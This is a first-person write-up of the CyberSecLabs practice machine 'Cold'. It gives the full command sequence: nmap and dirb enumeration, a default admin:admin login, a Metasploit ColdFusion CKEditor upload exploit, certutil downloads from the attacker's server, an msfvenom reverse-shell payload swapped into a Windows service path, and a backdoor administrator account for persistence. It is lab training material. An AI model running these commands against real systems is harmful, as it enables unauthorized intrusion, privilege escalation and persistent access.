CyberSecLabs-Cold
This is my fifth write up and I will be discussing my experience with the machine “Cold” from CyberSecLabs. CyberSecLabs is a great platform, for people who are new to penetration testing and want to learn. Cold was listed as an easy machine but, in my opinion it was quite the challenge. An Adobe Cold Fusion file upload exploit grants user access on the server leading to a privilege escalation in Windows services.
Step 1: Enumeration
I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV. The second scan pretty much gave me similar results with a ton of open port rabbit holes…
sinner@kali:~$ sudo nmap -sC -sV 172.31.1.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020–07–06 23:16 EDT
Nmap scan report for 172.31.1.15
Host is up (0.066s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.30)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
| http-title: Welcome to XAMPP
|_Requested resource was http://172.31.1.15/dashboard/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.30)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
| http-title: Welcome to XAMPP
|_Requested resource was https://172.31.1.15/dashboard/
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009–11–10T23:48:47
|_Not valid after: 2019–11–08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2–2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: COLD
| NetBIOS_Domain_Name: COLD
| NetBIOS_Computer_Name: COLD
| DNS_Domain_Name: Cold
| DNS_Computer_Name: Cold
| Product_Version: 6.3.9600
|_ System_Time: 2020–07–07T03:17:47+00:00
| ssl-cert: Subject: commonName=Cold
| Not valid before: 2020–04–26T22:49:07
|_Not valid after: 2020–10–26T22:49:07
5500/tcp open http Jetty 9.3.6.v20151106
|_http-server-header: Jetty(9.3.6.v20151106)
|_http-title: Error 404
8500/tcp open http Samsung AllShare httpd
|_http-title: 404
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2–2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_nbstat: NetBIOS name: COLD, NetBIOS user: <unknown>, NetBIOS MAC: 02:65:1d:bf:21:60 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020–07–07T03:17:47
|_ start_date: 2020–07–07T03:10:15Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.87 seconds
I always start with the first port and work down the list, that way I can stay organized. Visiting port 80 brought me to a xampp deployment page. This page had me running around in circles for a while. After testing each port and not finding anything of interest I decided to go back and visit port 8500. There had to be something there because none of the other ports gave me anything.
I did some googling on this port and discovered that Adobe ColdFusion is usually sitting behind it. I ran dirb and it did not find anything of interest. When I cannot find a hit in the default wordlist I try and locate a known wordlist for the service I am targeting and found this by googling adobe coldfusion wordlist:
I fed this into dirb with the following command and got some hits:
dirb http://172.31.1.15:8500/ /usr/share/wordlists/coldfusion.txt
I started by visiting the parent directory for the hits /CFIDE/administrator.
http://172.31.1.15:8500/CFIDE/administrator/
I get an admin login page and noticed that the username admin is already baked into the username field. I put in the password admin because you should always try admin:admin on login pages duh..
Sure enough…access was granted!
Step 2: Exploitation
I googled the keywords: Adobe ColdFusion exploit and found a file upload exploit in the CKEditor.
Ran the following commands:
sudo msfconsoleuse exploit/multi/http/coldfusion_ckeditor_file_uploadset RHOSTS 172.31.1.15set LHOST tun0run
I got a low-level shell as user jade
Step 3: Post Exploitation
Browsing around there are a lot of overwhelming number of files and directories to look at. I tried pushing some privesc exploits on the box and they did not run. I noticed a ton of bat files and they would run for me. I did some more googling to see if there are any .bat privesc scripts and found this:
Cloned the repo onto my kali box and hosted a simple server in the directory it was cloned.
sudo python -m SimpleHTTPServer 80Now on the windows box I ran this to grab the file and run it.
certutil.exe -urlcache -split -f "http://youriphere:80/winPEAS.bat"winPEAS.bat
After I was done grabbing the file from my python simple server I killed it with ctrl-z.
Looking at the results the service paths exploits caught my attention and aimed for the one with cold.
Following the link listed in results it showed me how to exploit the service path.
I focused on the section named “Modify service binary path” it shows that you can replace the service path with your desired executable.
I created a netcat executable naming it to what I wanted with msfvenom and pushed it to the box running the python simple server again in the same directory that created this file.
On my Kali machine:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=your ip here LPORT=1234 -f exe > sin.exesudo python -m SimpleHTTPServer 80
On the Windows Machine:
certutil.exe -urlcache -split -f “http://youriphere:80/sin.exe”Now I baked this file into the cold service using the following command:
sc config cold binpath= “C:\ColdFusion2018\cfusion\bin\sin.exe”It gave me the following success message this lets me know it worked:
[SC] ChangeServiceConfig SUCCESSNow I going back to my kali machine opening another terminal window I fired up another metasploit console and created a handler to grab a connection back from the service when I start it on the windows machine.
sudo msfconsole use exploit/multi/handlerset LHOST tun0set LPORT 1234set payload/windows/meterpreter/reverse_tcprun
Going back to the windows box I ran
sc start coldMy handler grabbed the connection giving me a meterpreter shell as admin!
The connection to the box closes pretty fast so I was able to surf to the admin flag and grab it quick.
If you don't want to race with the shell you can create a user with full privileges for persistence with the following commands:
On the Windows Machine:
net user sinner Password1! /addnet localgroup administrators sinner
Then connect with a tool I like to use called evil-winrm.
On the Kali machine:
evil-winrm -i 172.31.1.15 -u sinner -p ‘Password1!’
